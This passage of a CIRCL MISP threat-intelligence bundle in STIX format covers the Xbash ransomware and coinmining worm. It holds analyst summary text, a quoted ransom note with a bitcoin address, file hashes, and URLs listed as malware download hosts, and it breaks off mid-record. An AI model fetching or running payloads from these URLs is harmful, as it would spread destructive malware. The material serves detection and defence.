{ "type": "bundle", "id": "bundle--5ba1d01f-27cc-438f-9cbc-4652950d210f", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:36.000Z", "modified": "2018-09-19T05:21:36.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--5ba1d01f-27cc-438f-9cbc-4652950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:36.000Z", "modified": "2018-09-19T05:21:36.000Z", "name": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows", "published": "2018-09-19T05:21:55Z", "object_refs": [ "observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f", "url--5ba1d038-785c-41d2-8712-4c5d950d210f", "x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f", "x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f", "indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f", "indicator--5ba1d258-c978-467b-acc6-28a2950d210f", "indicator--5ba1d258-9f30-40cc-b608-28a2950d210f", "indicator--5ba1d259-3908-490a-947e-28a2950d210f", "indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f", "indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f", "indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f", "indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f", "indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f", "indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f", "indicator--5ba1d299-3438-4286-a1ad-4737950d210f", "indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f", "indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f", "indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f", "indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f", "indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f", "indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f", "indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f", "indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f", "indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f", "indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f", "indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f", "indicator--5ba1d4d0-bddc-4521-814d-473c950d210f", "indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f", "indicator--5ba1d4d1-1698-491d-a555-4331950d210f", "indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f", "indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f", "indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f", "indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f", "indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f", "indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f", "indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f", "indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f", "indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f", "indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f", "indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f", "indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f", "indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f", "indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f", "indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f", "indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f", "indicator--5ba1d508-02d8-44e3-a778-27c3950d210f", "indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f", "indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f", "indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f", "x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f", "x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f", "indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f", "indicator--5ba1d560-0e08-460b-9909-480b950d210f", "indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f", "x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f", "x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f", "x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f", "x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f", "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e", "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03", "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5", "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0", "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91", "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9", "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564", "indicator--93747f03-1eec-47e4-82bc-29b8356a4961", "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c", "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07", "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7", "indicator--45a9a837-c3c8-436c-a546-30547955ba2c", "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862", "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a", "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c", "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e", "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba", "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3", "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096", "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa", "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63", "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e", "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a", "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "relationship--62c44254-dfdd-46a5-8405-b822bd1e8729", "relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d", "relationship--3a5866c4-e62f-456c-822c-e656cef75d59", "relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e", "relationship--97dce8d6-48a2-4712-bd1a-378edec44abe", "relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f", "relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc", "relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196", "relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51", "relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926", "relationship--d20dc510-00b2-4562-862d-af956e2cd62b", "relationship--2dd0a986-b772-4b30-b878-9e1e211e7482", "relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574", "relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a", "relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "ms-caro-malware:malware-platform=\"Python\"", "osint:source-type=\"blog-post\"", "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"", "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"", "misp-galaxy:tool=\"Xbash\"", "misp-galaxy:threat-actor=\"Iron Group\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:10:42.000Z", "modified": "2018-09-19T05:10:42.000Z", "first_observed": "2018-09-19T05:10:42Z", "last_observed": "2018-09-19T05:10:42Z", "number_observed": 1, "object_refs": [ "url--5ba1d038-785c-41d2-8712-4c5d950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5ba1d038-785c-41d2-8712-4c5d950d210f", "value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:10:43.000Z", "modified": "2018-09-19T05:10:43.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"" ], "x_misp_category": "External analysis", "x_misp_type": "text", "x_misp_value": "Unit 42 researchers have found a new malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations\u00e2\u20ac\u2122 network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u00e2\u20ac\u2122s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, as see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015." }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:29:27.000Z", "modified": "2018-09-19T04:29:27.000Z", "labels": [ "misp:type=\"btc\"", "misp:category=\"Financial fraud\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Financial fraud", "x_misp_comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u00e2\u20ac\u0153PLEASE_READ_ME_XYZ\u00e2\u20ac\u009d, and insert a ransom message into table \u00e2\u20ac\u0153WARNING\u00e2\u20ac\u009d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me", "x_misp_type": "btc", "x_misp_value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:39.000Z", "modified": "2018-09-19T04:36:39.000Z", "description": "zlibx", "pattern": "[file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:39Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d258-c978-467b-acc6-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:40.000Z", "modified": "2018-09-19T04:36:40.000Z", "description": "Xbash", "pattern": "[file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:40Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d258-9f30-40cc-b608-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:40.000Z", "modified": "2018-09-19T04:36:40.000Z", "description": "xapache", "pattern": "[file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:40Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d259-3908-490a-947e-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:41.000Z", "modified": "2018-09-19T04:36:41.000Z", "description": "libhttpd", "pattern": "[file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:41.000Z", "modified": "2018-09-19T04:36:41.000Z", "description": "XbashX", "pattern": "[file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:41.000Z", "modified": "2018-09-19T04:36:41.000Z", "description": "XbashY", "pattern": "[file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:42.000Z", "modified": "2018-09-19T04:36:42.000Z", "description": "rootv2.sh", "pattern": "[file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:42Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:42.000Z", "modified": "2018-09-19T04:36:42.000Z", "description": "owerv2.sh", "pattern": "[file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:42Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:43.000Z", "modified": "2018-09-19T04:36:43.000Z", "description": "rootv2.sh", "pattern": "[file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:43.000Z", "modified": "2018-09-19T04:36:43.000Z", "description": "r88.sh", "pattern": "[file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d299-3438-4286-a1ad-4737950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:45.000Z", "modified": "2018-09-19T04:37:45.000Z", "description": "tt.txt", "pattern": "[file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:45Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:46.000Z", "modified": "2018-09-19T04:37:46.000Z", "description": "tg.jpg", "pattern": "[file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:46Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:46.000Z", "modified": "2018-09-19T04:37:46.000Z", "description": "reg9.sct", "pattern": "[file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:46Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:47.000Z", "modified": "2018-09-19T04:37:47.000Z", "description": "m.png", "pattern": "[file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:47.000Z", "modified": "2018-09-19T04:37:47.000Z", "description": "tmp.jpg", "pattern": "[file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:09.000Z", "modified": "2018-09-19T04:47:09.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/zlibx']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:09.000Z", "modified": "2018-09-19T04:47:09.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashY']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:10.000Z", "modified": "2018-09-19T04:47:10.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/XbashY']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:10.000Z", "modified": "2018-09-19T04:47:10.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/xapache']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:10.000Z", "modified": "2018-09-19T04:47:10.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/libhttpd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:11.000Z", "modified": "2018-09-19T04:47:11.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/rootv2.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:11Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:11.000Z", "modified": "2018-09-19T04:47:11.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/l2/rootv2.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:11Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d0-bddc-4521-814d-473c950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:12.000Z", "modified": "2018-09-19T04:47:12.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/r88.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:12.000Z", "modified": "2018-09-19T04:47:12.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/12/r88.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d1-1698-491d-a555-4331950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:13.000Z", "modified": "2018-09-19T04:47:13.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/lowerv2.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": 